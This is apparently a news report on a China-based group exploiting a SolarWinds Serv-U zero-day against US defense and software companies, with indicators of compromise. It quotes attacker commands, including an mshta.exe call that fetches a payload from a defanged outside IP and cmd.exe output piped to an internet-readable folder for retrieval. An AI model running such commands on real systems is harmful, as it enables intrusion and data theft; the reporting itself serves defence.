China-based hackers actively target US defense and software companies using a vulnerability in the SolarWinds Serv-U FTP server.
Today, SolarWinds released a security update for a zero-day vulnerability in Serv-U FTP servers that allow remote code execution when SSH is enabled.
According to SolarWinds, this vulnerability was disclosed to Microsoft, who saw a threat actor actively exploiting the vulnerability to execute commands on vulnerable customer’s devices.
Tonight, Microsoft disclosed that the attacks are attributed with high confidence to a China-based threat group tracked as ‘DEV-0322.’
“This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,” says a new blog post by the Microsoft Threat Intelligence Center.
This threat group targets publicly exposed Serv-U FTP servers belonging to entities in the US Defense Industrial Base Sector and software companies.
“The DIB Sector is the worldwide industrial complex that enables research and development (R&D), as well as design, production, delivery, and maintenance of military weapons systems, subsystems, and components or parts, to meet U.S. military requirements,” explains a CISA document describing the DIB sector.
Attacks detected by Microsoft 365 Defender telemetry
Microsoft says they first learned of the attacks after Microsoft 365 Defender telemetry showed a normally harmless Serv-U process spawning anomalous malicious processes.
Some of the commands executed through the remote code execution vulnerability are listed below.
C:WindowsSystem32mshta.exe http://144[.]34[.]179[.]162/a (defanged) cmd.exe /c whoami > “./Client/Common/redacted.txt” cmd.exe /c dir > “.ClientCommonredacted.txt” cmd.exe /c “”C:WindowsTempServ-U.bat”” powershell.exe C:WindowsTempServ-U.bat cmd.exe /c type \redactedredacted.Archive > “C:ProgramDataRhinoSoftServ-UUsersGlobal Usersredacted.Archive”
“We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U ClientCommon folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands,” Microsoft explains in their blog post.
Other commands would add a global admin user to the Serv-U FTP server configuration or launch batch files and scripts to likely install malware on the devices for persistence and remote access.
Microsoft says Serv-U users can check if their devices were compromised by checking the Serv-U DebugSocketLog.txt log file and looking for exception messages.
A “C0000005; CSUSSHSocket::ProcessReceive” exception could indicate that the threat actors attempted to exploit the Serv-U server, but the exception could be shown for other reasons as well.
An example exception seen in logs is displayed below.
EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5
Other signs that a device may have been compromised are:
- Recently created .txt files under the ClientCommon folder.
- Serv-U spawned processes for mshta.exe, powershell.exe, cmd.exe, and processes running from C:Windowstemp.
- Unrecognized global users in the Serv-U configuration.
BleepingComputer has reached out to Microsoft to learn more about what commands or malware were executed by the batch file and scripts but has not heard back.